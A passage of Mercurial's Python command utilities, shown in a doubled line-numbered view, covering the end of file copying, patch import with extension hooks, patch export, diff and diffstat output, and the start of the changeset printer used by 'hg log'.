1083 raise error.Abort(_('no destination specified'))
1084 dest = pats.pop()
1084 dest = pats.pop()
1085 destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
1085 destdirexists = os.path.isdir(dest) and not os.path.islink(dest)
1086 if not destdirexists:
1086 if not destdirexists:
1087 if len(pats) > 1 or matchmod.patkind(pats[0]):
1087 if len(pats) > 1 or matchmod.patkind(pats[0]):
1088 raise error.Abort(_('with multiple sources, destination must be an '
1088 raise error.Abort(_('with multiple sources, destination must be an '
1089 'existing directory'))
1089 'existing directory'))
1090 if util.endswithsep(dest):
1090 if util.endswithsep(dest):
1091 raise error.Abort(_('destination %s is not a directory') % dest)
1091 raise error.Abort(_('destination %s is not a directory') % dest)
1092
1092
1093 tfn = targetpathfn
1093 tfn = targetpathfn
1094 if after:
1094 if after:
1095 tfn = targetpathafterfn
1095 tfn = targetpathafterfn
1096 copylist = []
1096 copylist = []
1097 for pat in pats:
1097 for pat in pats:
1098 srcs = walkpat(pat)
1098 srcs = walkpat(pat)
1099 if not srcs:
1099 if not srcs:
1100 continue
1100 continue
1101 copylist.append((tfn(pat, dest, srcs), srcs))
1101 copylist.append((tfn(pat, dest, srcs), srcs))
1102 if not copylist:
1102 if not copylist:
1103 raise error.Abort(_('no files to copy'))
1103 raise error.Abort(_('no files to copy'))
1104
1104
1105 errors = 0
1105 errors = 0
1106 for targetpath, srcs in copylist:
1106 for targetpath, srcs in copylist:
1107 for abssrc, relsrc, exact in srcs:
1107 for abssrc, relsrc, exact in srcs:
1108 if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
1108 if copyfile(abssrc, relsrc, targetpath(abssrc), exact):
1109 errors += 1
1109 errors += 1
1110
1110
1111 if errors:
1111 if errors:
1112 ui.warn(_('(consider using --after)\n'))
1112 ui.warn(_('(consider using --after)\n'))
1113
1113
1114 return errors != 0
1114 return errors != 0
1115
1115
1116 ## facility to let extension process additional data into an import patch
1116 ## facility to let extension process additional data into an import patch
1117 # list of identifier to be executed in order
1117 # list of identifier to be executed in order
1118 extrapreimport = [] # run before commit
1118 extrapreimport = [] # run before commit
1119 extrapostimport = [] # run after commit
1119 extrapostimport = [] # run after commit
1120 # mapping from identifier to actual import function
1120 # mapping from identifier to actual import function
1121 #
1121 #
1122 # 'preimport' are run before the commit is made and are provided the following
1122 # 'preimport' are run before the commit is made and are provided the following
1123 # arguments:
1123 # arguments:
1124 # - repo: the localrepository instance,
1124 # - repo: the localrepository instance,
1125 # - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
1125 # - patchdata: data extracted from patch header (cf m.patch.patchheadermap),
1126 # - extra: the future extra dictionary of the changeset, please mutate it,
1126 # - extra: the future extra dictionary of the changeset, please mutate it,
1127 # - opts: the import options.
1127 # - opts: the import options.
1128 # XXX ideally, we would just pass an ctx ready to be computed, that would allow
1128 # XXX ideally, we would just pass an ctx ready to be computed, that would allow
1129 # mutation of in memory commit and more. Feel free to rework the code to get
1129 # mutation of in memory commit and more. Feel free to rework the code to get
1130 # there.
1130 # there.
1131 extrapreimportmap = {}
1131 extrapreimportmap = {}
1132 # 'postimport' are run after the commit is made and are provided the following
1132 # 'postimport' are run after the commit is made and are provided the following
1133 # argument:
1133 # argument:
1134 # - ctx: the changectx created by import.
1134 # - ctx: the changectx created by import.
1135 extrapostimportmap = {}
1135 extrapostimportmap = {}
1136
1136
1137 def tryimportone(ui, repo, hunk, parents, opts, msgs, updatefunc):
1137 def tryimportone(ui, repo, hunk, parents, opts, msgs, updatefunc):
1138 """Utility function used by commands.import to import a single patch
1138 """Utility function used by commands.import to import a single patch
1139
1139
1140 This function is explicitly defined here to help the evolve extension to
1140 This function is explicitly defined here to help the evolve extension to
1141 wrap this part of the import logic.
1141 wrap this part of the import logic.
1142
1142
1143 The API is currently a bit ugly because it a simple code translation from
1143 The API is currently a bit ugly because it a simple code translation from
1144 the import command. Feel free to make it better.
1144 the import command. Feel free to make it better.
1145
1145
1146 :hunk: a patch (as a binary string)
1146 :hunk: a patch (as a binary string)
1147 :parents: nodes that will be parent of the created commit
1147 :parents: nodes that will be parent of the created commit
1148 :opts: the full dict of option passed to the import command
1148 :opts: the full dict of option passed to the import command
1149 :msgs: list to save commit message to.
1149 :msgs: list to save commit message to.
1150 (used in case we need to save it when failing)
1150 (used in case we need to save it when failing)
1151 :updatefunc: a function that update a repo to a given node
1151 :updatefunc: a function that update a repo to a given node
1152 updatefunc(<repo>, <node>)
1152 updatefunc(<repo>, <node>)
1153 """
1153 """
1154 # avoid cycle context -> subrepo -> cmdutil
1154 # avoid cycle context -> subrepo -> cmdutil
1155 from . import context
1155 from . import context
1156 extractdata = patch.extract(ui, hunk)
1156 extractdata = patch.extract(ui, hunk)
1157 tmpname = extractdata.get('filename')
1157 tmpname = extractdata.get('filename')
1158 message = extractdata.get('message')
1158 message = extractdata.get('message')
1159 user = opts.get('user') or extractdata.get('user')
1159 user = opts.get('user') or extractdata.get('user')
1160 date = opts.get('date') or extractdata.get('date')
1160 date = opts.get('date') or extractdata.get('date')
1161 branch = extractdata.get('branch')
1161 branch = extractdata.get('branch')
1162 nodeid = extractdata.get('nodeid')
1162 nodeid = extractdata.get('nodeid')
1163 p1 = extractdata.get('p1')
1163 p1 = extractdata.get('p1')
1164 p2 = extractdata.get('p2')
1164 p2 = extractdata.get('p2')
1165
1165
1166 nocommit = opts.get('no_commit')
1166 nocommit = opts.get('no_commit')
1167 importbranch = opts.get('import_branch')
1167 importbranch = opts.get('import_branch')
1168 update = not opts.get('bypass')
1168 update = not opts.get('bypass')
1169 strip = opts["strip"]
1169 strip = opts["strip"]
1170 prefix = opts["prefix"]
1170 prefix = opts["prefix"]
1171 sim = float(opts.get('similarity') or 0)
1171 sim = float(opts.get('similarity') or 0)
1172 if not tmpname:
1172 if not tmpname:
1173 return (None, None, False)
1173 return (None, None, False)
1174
1174
1175 rejects = False
1175 rejects = False
1176
1176
1177 try:
1177 try:
1178 cmdline_message = logmessage(ui, opts)
1178 cmdline_message = logmessage(ui, opts)
1179 if cmdline_message:
1179 if cmdline_message:
1180 # pickup the cmdline msg
1180 # pickup the cmdline msg
1181 message = cmdline_message
1181 message = cmdline_message
1182 elif message:
1182 elif message:
1183 # pickup the patch msg
1183 # pickup the patch msg
1184 message = message.strip()
1184 message = message.strip()
1185 else:
1185 else:
1186 # launch the editor
1186 # launch the editor
1187 message = None
1187 message = None
1188 ui.debug('message:\n%s\n' % message)
1188 ui.debug('message:\n%s\n' % message)
1189
1189
1190 if len(parents) == 1:
1190 if len(parents) == 1:
1191 parents.append(repo[nullid])
1191 parents.append(repo[nullid])
1192 if opts.get('exact'):
1192 if opts.get('exact'):
1193 if not nodeid or not p1:
1193 if not nodeid or not p1:
1194 raise error.Abort(_('not a Mercurial patch'))
1194 raise error.Abort(_('not a Mercurial patch'))
1195 p1 = repo[p1]
1195 p1 = repo[p1]
1196 p2 = repo[p2 or nullid]
1196 p2 = repo[p2 or nullid]
1197 elif p2:
1197 elif p2:
1198 try:
1198 try:
1199 p1 = repo[p1]
1199 p1 = repo[p1]
1200 p2 = repo[p2]
1200 p2 = repo[p2]
1201 # Without any options, consider p2 only if the
1201 # Without any options, consider p2 only if the
1202 # patch is being applied on top of the recorded
1202 # patch is being applied on top of the recorded
1203 # first parent.
1203 # first parent.
1204 if p1 != parents[0]:
1204 if p1 != parents[0]:
1205 p1 = parents[0]
1205 p1 = parents[0]
1206 p2 = repo[nullid]
1206 p2 = repo[nullid]
1207 except error.RepoError:
1207 except error.RepoError:
1208 p1, p2 = parents
1208 p1, p2 = parents
1209 if p2.node() == nullid:
1209 if p2.node() == nullid:
1210 ui.warn(_("warning: import the patch as a normal revision\n"
1210 ui.warn(_("warning: import the patch as a normal revision\n"
1211 "(use --exact to import the patch as a merge)\n"))
1211 "(use --exact to import the patch as a merge)\n"))
1212 else:
1212 else:
1213 p1, p2 = parents
1213 p1, p2 = parents
1214
1214
1215 n = None
1215 n = None
1216 if update:
1216 if update:
1217 if p1 != parents[0]:
1217 if p1 != parents[0]:
1218 updatefunc(repo, p1.node())
1218 updatefunc(repo, p1.node())
1219 if p2 != parents[1]:
1219 if p2 != parents[1]:
1220 repo.setparents(p1.node(), p2.node())
1220 repo.setparents(p1.node(), p2.node())
1221
1221
1222 if opts.get('exact') or importbranch:
1222 if opts.get('exact') or importbranch:
1223 repo.dirstate.setbranch(branch or 'default')
1223 repo.dirstate.setbranch(branch or 'default')
1224
1224
1225 partial = opts.get('partial', False)
1225 partial = opts.get('partial', False)
1226 files = set()
1226 files = set()
1227 try:
1227 try:
1228 patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
1228 patch.patch(ui, repo, tmpname, strip=strip, prefix=prefix,
1229 files=files, eolmode=None, similarity=sim / 100.0)
1229 files=files, eolmode=None, similarity=sim / 100.0)
1230 except patch.PatchError as e:
1230 except patch.PatchError as e:
1231 if not partial:
1231 if not partial:
1232 raise error.Abort(str(e))
1232 raise error.Abort(str(e))
1233 if partial:
1233 if partial:
1234 rejects = True
1234 rejects = True
1235
1235
1236 files = list(files)
1236 files = list(files)
1237 if nocommit:
1237 if nocommit:
1238 if message:
1238 if message:
1239 msgs.append(message)
1239 msgs.append(message)
1240 else:
1240 else:
1241 if opts.get('exact') or p2:
1241 if opts.get('exact') or p2:
1242 # If you got here, you either use --force and know what
1242 # If you got here, you either use --force and know what
1243 # you are doing or used --exact or a merge patch while
1243 # you are doing or used --exact or a merge patch while
1244 # being updated to its first parent.
1244 # being updated to its first parent.
1245 m = None
1245 m = None
1246 else:
1246 else:
1247 m = scmutil.matchfiles(repo, files or [])
1247 m = scmutil.matchfiles(repo, files or [])
1248 editform = mergeeditform(repo[None], 'import.normal')
1248 editform = mergeeditform(repo[None], 'import.normal')
1249 if opts.get('exact'):
1249 if opts.get('exact'):
1250 editor = None
1250 editor = None
1251 else:
1251 else:
1252 editor = getcommiteditor(editform=editform, **opts)
1252 editor = getcommiteditor(editform=editform, **opts)
1253 extra = {}
1253 extra = {}
1254 for idfunc in extrapreimport:
1254 for idfunc in extrapreimport:
1255 extrapreimportmap[idfunc](repo, extractdata, extra, opts)
1255 extrapreimportmap[idfunc](repo, extractdata, extra, opts)
1256 overrides = {}
1256 overrides = {}
1257 if partial:
1257 if partial:
1258 overrides[('ui', 'allowemptycommit')] = True
1258 overrides[('ui', 'allowemptycommit')] = True
1259 with repo.ui.configoverride(overrides, 'import'):
1259 with repo.ui.configoverride(overrides, 'import'):
1260 n = repo.commit(message, user,
1260 n = repo.commit(message, user,
1261 date, match=m,
1261 date, match=m,
1262 editor=editor, extra=extra)
1262 editor=editor, extra=extra)
1263 for idfunc in extrapostimport:
1263 for idfunc in extrapostimport:
1264 extrapostimportmap[idfunc](repo[n])
1264 extrapostimportmap[idfunc](repo[n])
1265 else:
1265 else:
1266 if opts.get('exact') or importbranch:
1266 if opts.get('exact') or importbranch:
1267 branch = branch or 'default'
1267 branch = branch or 'default'
1268 else:
1268 else:
1269 branch = p1.branch()
1269 branch = p1.branch()
1270 store = patch.filestore()
1270 store = patch.filestore()
1271 try:
1271 try:
1272 files = set()
1272 files = set()
1273 try:
1273 try:
1274 patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
1274 patch.patchrepo(ui, repo, p1, store, tmpname, strip, prefix,
1275 files, eolmode=None)
1275 files, eolmode=None)
1276 except patch.PatchError as e:
1276 except patch.PatchError as e:
1277 raise error.Abort(str(e))
1277 raise error.Abort(str(e))
1278 if opts.get('exact'):
1278 if opts.get('exact'):
1279 editor = None
1279 editor = None
1280 else:
1280 else:
1281 editor = getcommiteditor(editform='import.bypass')
1281 editor = getcommiteditor(editform='import.bypass')
1282 memctx = context.memctx(repo, (p1.node(), p2.node()),
1282 memctx = context.memctx(repo, (p1.node(), p2.node()),
1283 message,
1283 message,
1284 files=files,
1284 files=files,
1285 filectxfn=store,
1285 filectxfn=store,
1286 user=user,
1286 user=user,
1287 date=date,
1287 date=date,
1288 branch=branch,
1288 branch=branch,
1289 editor=editor)
1289 editor=editor)
1290 n = memctx.commit()
1290 n = memctx.commit()
1291 finally:
1291 finally:
1292 store.close()
1292 store.close()
1293 if opts.get('exact') and nocommit:
1293 if opts.get('exact') and nocommit:
1294 # --exact with --no-commit is still useful in that it does merge
1294 # --exact with --no-commit is still useful in that it does merge
1295 # and branch bits
1295 # and branch bits
1296 ui.warn(_("warning: can't check exact import with --no-commit\n"))
1296 ui.warn(_("warning: can't check exact import with --no-commit\n"))
1297 elif opts.get('exact') and hex(n) != nodeid:
1297 elif opts.get('exact') and hex(n) != nodeid:
1298 raise error.Abort(_('patch is damaged or loses information'))
1298 raise error.Abort(_('patch is damaged or loses information'))
1299 msg = _('applied to working directory')
1299 msg = _('applied to working directory')
1300 if n:
1300 if n:
1301 # i18n: refers to a short changeset id
1301 # i18n: refers to a short changeset id
1302 msg = _('created %s') % short(n)
1302 msg = _('created %s') % short(n)
1303 return (msg, n, rejects)
1303 return (msg, n, rejects)
1304 finally:
1304 finally:
1305 os.unlink(tmpname)
1305 os.unlink(tmpname)
1306
1306
1307 # facility to let extensions include additional data in an exported patch
1307 # facility to let extensions include additional data in an exported patch
1308 # list of identifiers to be executed in order
1308 # list of identifiers to be executed in order
1309 extraexport = []
1309 extraexport = []
1310 # mapping from identifier to actual export function
1310 # mapping from identifier to actual export function
1311 # function as to return a string to be added to the header or None
1311 # function as to return a string to be added to the header or None
1312 # it is given two arguments (sequencenumber, changectx)
1312 # it is given two arguments (sequencenumber, changectx)
1313 extraexportmap = {}
1313 extraexportmap = {}
1314
1314
1315 def _exportsingle(repo, ctx, match, switch_parent, rev, seqno, write, diffopts):
1315 def _exportsingle(repo, ctx, match, switch_parent, rev, seqno, write, diffopts):
1316 node = scmutil.binnode(ctx)
1316 node = scmutil.binnode(ctx)
1317 parents = [p.node() for p in ctx.parents() if p]
1317 parents = [p.node() for p in ctx.parents() if p]
1318 branch = ctx.branch()
1318 branch = ctx.branch()
1319 if switch_parent:
1319 if switch_parent:
1320 parents.reverse()
1320 parents.reverse()
1321
1321
1322 if parents:
1322 if parents:
1323 prev = parents[0]
1323 prev = parents[0]
1324 else:
1324 else:
1325 prev = nullid
1325 prev = nullid
1326
1326
1327 write("# HG changeset patch\n")
1327 write("# HG changeset patch\n")
1328 write("# User %s\n" % ctx.user())
1328 write("# User %s\n" % ctx.user())
1329 write("# Date %d %d\n" % ctx.date())
1329 write("# Date %d %d\n" % ctx.date())
1330 write("# %s\n" % util.datestr(ctx.date()))
1330 write("# %s\n" % util.datestr(ctx.date()))
1331 if branch and branch != 'default':
1331 if branch and branch != 'default':
1332 write("# Branch %s\n" % branch)
1332 write("# Branch %s\n" % branch)
1333 write("# Node ID %s\n" % hex(node))
1333 write("# Node ID %s\n" % hex(node))
1334 write("# Parent %s\n" % hex(prev))
1334 write("# Parent %s\n" % hex(prev))
1335 if len(parents) > 1:
1335 if len(parents) > 1:
1336 write("# Parent %s\n" % hex(parents[1]))
1336 write("# Parent %s\n" % hex(parents[1]))
1337
1337
1338 for headerid in extraexport:
1338 for headerid in extraexport:
1339 header = extraexportmap[headerid](seqno, ctx)
1339 header = extraexportmap[headerid](seqno, ctx)
1340 if header is not None:
1340 if header is not None:
1341 write('# %s\n' % header)
1341 write('# %s\n' % header)
1342 write(ctx.description().rstrip())
1342 write(ctx.description().rstrip())
1343 write("\n\n")
1343 write("\n\n")
1344
1344
1345 for chunk, label in patch.diffui(repo, prev, node, match, opts=diffopts):
1345 for chunk, label in patch.diffui(repo, prev, node, match, opts=diffopts):
1346 write(chunk, label=label)
1346 write(chunk, label=label)
1347
1347
1348 def export(repo, revs, fntemplate='hg-%h.patch', fp=None, switch_parent=False,
1348 def export(repo, revs, fntemplate='hg-%h.patch', fp=None, switch_parent=False,
1349 opts=None, match=None):
1349 opts=None, match=None):
1350 '''export changesets as hg patches
1350 '''export changesets as hg patches
1351
1351
1352 Args:
1352 Args:
1353 repo: The repository from which we're exporting revisions.
1353 repo: The repository from which we're exporting revisions.
1354 revs: A list of revisions to export as revision numbers.
1354 revs: A list of revisions to export as revision numbers.
1355 fntemplate: An optional string to use for generating patch file names.
1355 fntemplate: An optional string to use for generating patch file names.
1356 fp: An optional file-like object to which patches should be written.
1356 fp: An optional file-like object to which patches should be written.
1357 switch_parent: If True, show diffs against second parent when not nullid.
1357 switch_parent: If True, show diffs against second parent when not nullid.
1358 Default is false, which always shows diff against p1.
1358 Default is false, which always shows diff against p1.
1359 opts: diff options to use for generating the patch.
1359 opts: diff options to use for generating the patch.
1360 match: If specified, only export changes to files matching this matcher.
1360 match: If specified, only export changes to files matching this matcher.
1361
1361
1362 Returns:
1362 Returns:
1363 Nothing.
1363 Nothing.
1364
1364
1365 Side Effect:
1365 Side Effect:
1366 "HG Changeset Patch" data is emitted to one of the following
1366 "HG Changeset Patch" data is emitted to one of the following
1367 destinations:
1367 destinations:
1368 fp is specified: All revs are written to the specified
1368 fp is specified: All revs are written to the specified
1369 file-like object.
1369 file-like object.
1370 fntemplate specified: Each rev is written to a unique file named using
1370 fntemplate specified: Each rev is written to a unique file named using
1371 the given template.
1371 the given template.
1372 Neither fp nor template specified: All revs written to repo.ui.write()
1372 Neither fp nor template specified: All revs written to repo.ui.write()
1373 '''
1373 '''
1374
1374
1375 total = len(revs)
1375 total = len(revs)
1376 revwidth = max(len(str(rev)) for rev in revs)
1376 revwidth = max(len(str(rev)) for rev in revs)
1377 filemode = {}
1377 filemode = {}
1378
1378
1379 write = None
1379 write = None
1380 dest = '<unnamed>'
1380 dest = '<unnamed>'
1381 if fp:
1381 if fp:
1382 dest = getattr(fp, 'name', dest)
1382 dest = getattr(fp, 'name', dest)
1383 def write(s, **kw):
1383 def write(s, **kw):
1384 fp.write(s)
1384 fp.write(s)
1385 elif not fntemplate:
1385 elif not fntemplate:
1386 write = repo.ui.write
1386 write = repo.ui.write
1387
1387
1388 for seqno, rev in enumerate(revs, 1):
1388 for seqno, rev in enumerate(revs, 1):
1389 ctx = repo[rev]
1389 ctx = repo[rev]
1390 fo = None
1390 fo = None
1391 if not fp and fntemplate:
1391 if not fp and fntemplate:
1392 desc_lines = ctx.description().rstrip().split('\n')
1392 desc_lines = ctx.description().rstrip().split('\n')
1393 desc = desc_lines[0] #Commit always has a first line.
1393 desc = desc_lines[0] #Commit always has a first line.
1394 fo = makefileobj(repo, fntemplate, ctx.node(), desc=desc,
1394 fo = makefileobj(repo, fntemplate, ctx.node(), desc=desc,
1395 total=total, seqno=seqno, revwidth=revwidth,
1395 total=total, seqno=seqno, revwidth=revwidth,
1396 mode='wb', modemap=filemode)
1396 mode='wb', modemap=filemode)
1397 dest = fo.name
1397 dest = fo.name
1398 def write(s, **kw):
1398 def write(s, **kw):
1399 fo.write(s)
1399 fo.write(s)
1400 if not dest.startswith('<'):
1400 if not dest.startswith('<'):
1401 repo.ui.note("%s\n" % dest)
1401 repo.ui.note("%s\n" % dest)
1402 _exportsingle(
1402 _exportsingle(
1403 repo, ctx, match, switch_parent, rev, seqno, write, opts)
1403 repo, ctx, match, switch_parent, rev, seqno, write, opts)
1404 if fo is not None:
1404 if fo is not None:
1405 fo.close()
1405 fo.close()
1406
1406
1407 def diffordiffstat(ui, repo, diffopts, node1, node2, match,
1407 def diffordiffstat(ui, repo, diffopts, node1, node2, match,
1408 changes=None, stat=False, fp=None, prefix='',
1408 changes=None, stat=False, fp=None, prefix='',
1409 root='', listsubrepos=False):
1409 root='', listsubrepos=False):
1410 '''show diff or diffstat.'''
1410 '''show diff or diffstat.'''
1411 if fp is None:
1411 if fp is None:
1412 write = ui.write
1412 write = ui.write
1413 else:
1413 else:
1414 def write(s, **kw):
1414 def write(s, **kw):
1415 fp.write(s)
1415 fp.write(s)
1416
1416
1417 if root:
1417 if root:
1418 relroot = pathutil.canonpath(repo.root, repo.getcwd(), root)
1418 relroot = pathutil.canonpath(repo.root, repo.getcwd(), root)
1419 else:
1419 else:
1420 relroot = ''
1420 relroot = ''
1421 if relroot != '':
1421 if relroot != '':
1422 # XXX relative roots currently don't work if the root is within a
1422 # XXX relative roots currently don't work if the root is within a
1423 # subrepo
1423 # subrepo
1424 uirelroot = match.uipath(relroot)
1424 uirelroot = match.uipath(relroot)
1425 relroot += '/'
1425 relroot += '/'
1426 for matchroot in match.files():
1426 for matchroot in match.files():
1427 if not matchroot.startswith(relroot):
1427 if not matchroot.startswith(relroot):
1428 ui.warn(_('warning: %s not inside relative root %s\n') % (
1428 ui.warn(_('warning: %s not inside relative root %s\n') % (
1429 match.uipath(matchroot), uirelroot))
1429 match.uipath(matchroot), uirelroot))
1430
1430
1431 if stat:
1431 if stat:
1432 diffopts = diffopts.copy(context=0)
1432 diffopts = diffopts.copy(context=0)
1433 width = 80
1433 width = 80
1434 if not ui.plain():
1434 if not ui.plain():
1435 width = ui.termwidth()
1435 width = ui.termwidth()
1436 chunks = patch.diff(repo, node1, node2, match, changes, diffopts,
1436 chunks = patch.diff(repo, node1, node2, match, changes, diffopts,
1437 prefix=prefix, relroot=relroot)
1437 prefix=prefix, relroot=relroot)
1438 for chunk, label in patch.diffstatui(util.iterlines(chunks),
1438 for chunk, label in patch.diffstatui(util.iterlines(chunks),
1439 width=width):
1439 width=width):
1440 write(chunk, label=label)
1440 write(chunk, label=label)
1441 else:
1441 else:
1442 for chunk, label in patch.diffui(repo, node1, node2, match,
1442 for chunk, label in patch.diffui(repo, node1, node2, match,
1443 changes, diffopts, prefix=prefix,
1443 changes, diffopts, prefix=prefix,
1444 relroot=relroot):
1444 relroot=relroot):
1445 write(chunk, label=label)
1445 write(chunk, label=label)
1446
1446
1447 if listsubrepos:
1447 if listsubrepos:
1448 ctx1 = repo[node1]
1448 ctx1 = repo[node1]
1449 ctx2 = repo[node2]
1449 ctx2 = repo[node2]
1450 for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
1450 for subpath, sub in scmutil.itersubrepos(ctx1, ctx2):
1451 tempnode2 = node2
1451 tempnode2 = node2
1452 try:
1452 try:
1453 if node2 is not None:
1453 if node2 is not None:
1454 tempnode2 = ctx2.substate[subpath][1]
1454 tempnode2 = ctx2.substate[subpath][1]
1455 except KeyError:
1455 except KeyError:
1456 # A subrepo that existed in node1 was deleted between node1 and
1456 # A subrepo that existed in node1 was deleted between node1 and
1457 # node2 (inclusive). Thus, ctx2's substate won't contain that
1457 # node2 (inclusive). Thus, ctx2's substate won't contain that
1458 # subpath. The best we can do is to ignore it.
1458 # subpath. The best we can do is to ignore it.
1459 tempnode2 = None
1459 tempnode2 = None
1460 submatch = matchmod.subdirmatcher(subpath, match)
1460 submatch = matchmod.subdirmatcher(subpath, match)
1461 sub.diff(ui, diffopts, tempnode2, submatch, changes=changes,
1461 sub.diff(ui, diffopts, tempnode2, submatch, changes=changes,
1462 stat=stat, fp=fp, prefix=prefix)
1462 stat=stat, fp=fp, prefix=prefix)
1463
1463
1464 def _changesetlabels(ctx):
1464 def _changesetlabels(ctx):
1465 labels = ['log.changeset', 'changeset.%s' % ctx.phasestr()]
1465 labels = ['log.changeset', 'changeset.%s' % ctx.phasestr()]
1466 if ctx.obsolete():
1466 if ctx.obsolete():
1467 labels.append('changeset.obsolete')
1467 labels.append('changeset.obsolete')
1468 if ctx.isunstable():
1468 if ctx.isunstable():
1469 labels.append('changeset.troubled')
1469 labels.append('changeset.troubled')
1470 for instability in ctx.instabilities():
1470 for instability in ctx.instabilities():
1471 labels.append('trouble.%s' % instability)
1471 labels.append('trouble.%s' % instability)
1472 return ' '.join(labels)
1472 return ' '.join(labels)
1473
1473
1474 class changeset_printer(object):
1474 class changeset_printer(object):
1475 '''show changeset information when templating not requested.'''
1475 '''show changeset information when templating not requested.'''
1476
1476
1477 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1477 def __init__(self, ui, repo, matchfn, diffopts, buffered):
1478 self.ui = ui
1478 self.ui = ui
1479 self.repo = repo
1479 self.repo = repo
1480 self.buffered = buffered
1480 self.buffered = buffered
1481 self.matchfn = matchfn
1481 self.matchfn = matchfn
1482 self.diffopts = diffopts
1482 self.diffopts = diffopts
1483 self.header = {}
1483 self.header = {}
1484 self.hunk = {}
1484 self.hunk = {}
1485 self.lastheader = None
1485 self.lastheader = None
1486 self.footer = None
1486 self.footer = None
1487
1487
1488 def flush(self, ctx):
1488 def flush(self, ctx):
1489 rev = ctx.rev()
1489 rev = ctx.rev()
1490 if rev in self.header:
1490 if rev in self.header:
1491 h = self.header[rev]
1491 h = self.header[rev]
1492 if h != self.lastheader:
1492 if h != self.lastheader:
1493 self.lastheader = h
1493 self.lastheader = h
1494 self.ui.write(h)
1494 self.ui.write(h)
1495 del self.header[rev]
1495 del self.header[rev]
1496 if rev in self.hunk:
1496 if rev in self.hunk:
1497 self.ui.write(self.hunk[rev])
1497 self.ui.write(self.hunk[rev])
1498 del self.hunk[rev]
1498 del self.hunk[rev]
1499 return 1
1499 return 1
1500 return 0
1500 return 0
1501
1501
1502 def close(self):
1502 def close(self):
1503 if self.footer:
1503 if self.footer:
1504 self.ui.write(self.footer)
1504 self.ui.write(self.footer)
1505
1505
1506 def show(self, ctx, copies=None, matchfn=None, **props):
1506 def show(self, ctx, copies=None, matchfn=None, **props):
1507 props = pycompat.byteskwargs(props)
1507 props = pycompat.byteskwargs(props)
1508 if self.buffered:
1508 if self.buffered:
1509 self.ui.pushbuffer(labeled=True)
1509 self.ui.pushbuffer(labeled=True)
1510 self._show(ctx, copies, matchfn, props)
1510 self._show(ctx, copies, matchfn, props)
1511 self.hunk[ctx.rev()] = self.ui.popbuffer()
1511 self.hunk[ctx.rev()] = self.ui.popbuffer()
1512 else:
1512 else:
1513 self._show(ctx, copies, matchfn, props)
1513 self._show(ctx, copies, matchfn, props)
1514
1514
1515 def _show(self, ctx, copies, matchfn, props):
1515 def _show(self, ctx, copies, matchfn, props):
1516 '''show a single changeset or file revision'''
1516 '''show a single changeset or file revision'''
1517 changenode = ctx.node()
1517 changenode = ctx.node()
1518 rev = ctx.rev()
1518 rev = ctx.rev()
1519 if self.ui.debugflag:
1519 if self.ui.debugflag:
1520 hexfunc = hex
1520 hexfunc = hex
1521 else:
1521 else:
1522 hexfunc = short
1522 hexfunc = short
1523 # as of now, wctx.node() and wctx.rev() return None, but we want to
1523 # as of now, wctx.node() and wctx.rev() return None, but we want to
1524 # show the same values as {node} and {rev} templatekw
1524 # show the same values as {node} and {rev} templatekw
1525 revnode = (scmutil.intrev(ctx), hexfunc(scmutil.binnode(ctx)))
1525 revnode = (scmutil.intrev(ctx), hexfunc(scmutil.binnode(ctx)))
1526
1526
1527 if self.ui.quiet:
1527 if self.ui.quiet:
1528 self.ui.write("%d:%s\n" % revnode, label='log.node')
1528 self.ui.write("%d:%s\n" % revnode, label='log.node')
1529 return
1529 return
1530
1530
1531 date = util.datestr(ctx.date())
1531 date = util.datestr(ctx.date())
1532
1532
1533 # i18n: column positioning for "hg log"
1533 # i18n: column positioning for "hg log"
1534 self.ui.write(_("changeset: %d:%s\n") % revnode,
1534 self.ui.write(_("changeset: %d:%s\n") % revnode,
1535 label=_changesetlabels(ctx))
1535 label=_changesetlabels(ctx))
1536
1536
1537 # branches are shown first before any other names due to backwards
1537 # branches are shown first before any other names due to backwards
1538 # compatibility
1538 # compatibility
1539 branch = ctx.branch()
1539 branch = ctx.branch()
1540 # don't show the default branch name
1540 # don't show the default branch name
1541 if branch != 'default':
1541 if branch != 'default':
1542 # i18n: column positioning for "hg log"
1542 # i18n: column positioning for "hg log"
1543 self.ui.write(_("branch: %s\n") % branch,
1543 self.ui.write(_("branch: %s\n") % branch,
1544 label='log.branch')
1544 label='log.branch')
1545
1545
1546 for nsname, ns in self.repo.names.iteritems():
1546 for nsname, ns in self.repo.names.iteritems():
1547 # branches has special logic already handled above, so here we just
1547 # branches has special logic already handled above, so here we just
1548 # skip it
1548 # skip it
1549 if nsname == 'branches':
1549 if nsname == 'branches':
1550 continue
1550 continue
1551 # we will use the templatename as the color name since those two
1551 # we will use the templatename as the color name since those two
1552 # should be the same
1552 # should be the same
1553 for name in ns.names(self.repo, changenode):
1553 for name in ns.names(self.repo, changenode):
1554 self.ui.write(ns.logfmt % name,
1554 self.ui.write(ns.logfmt % name,
1555 label='log.%s' % ns.colorname)
1555 label='log.%s' % ns.colorname)
1556 if self.ui.debugflag:
1556 if self.ui.debugflag:
1557 # i18n: column positioning for "hg log"
1557 # i18n: column positioning for "hg log"
1558 self.ui.write(_("phase: %s\n") % ctx.phasestr(),
1558 self.ui.write(_("phase: %s\n") % ctx.phasestr(),
1559 label='log.phase')
1559 label='log.phase')
1560 for pctx in scmutil.meaningfulparents(self.repo, ctx):
1560 for pctx in scmutil.meaningfulparents(self.repo, ctx):
1561 label = 'log.parent changeset.%s' % pctx.phasestr()
1561 label = 'log.parent changeset.%s' % pctx.phasestr()
1562 # i18n: column positioning for "hg log"
1562 # i18n: column positioning for "hg log"
1563 self.ui.write(_("parent: %d:%s\n")
1563 self.ui.write(_("parent: %d:%s\n")
1564 % (pctx.rev(), hexfunc(pctx.node())),
1564 % (pctx.rev(), hexfunc(pctx.node())),
1565 label=label)
1565 label=label)
1566
1566
1567 if self.ui.debugflag and rev is not None:
1567 if self.ui.debugflag and rev is not None:
1568 mnode = ctx.manifestnode()
1568 mnode = ctx.manifestnode()
1569 # i18n: column positioning for "hg log"
1569 # i18n: column positioning for "hg log"
1570 self.ui.write(_("manifest: %d:%s\n") %
1570 self.ui.write(_("manifest: %d:%s\n") %
1571 (self.repo.manifestlog._revlog.rev(mnode),
1571 (self.repo.manifestlog._revlog.rev(mnode),
1572 hex(mnode)),
1572 hex(mnode)),
1573 label='ui.debug log.manifest')
1573 label='ui.debug log.manifest')
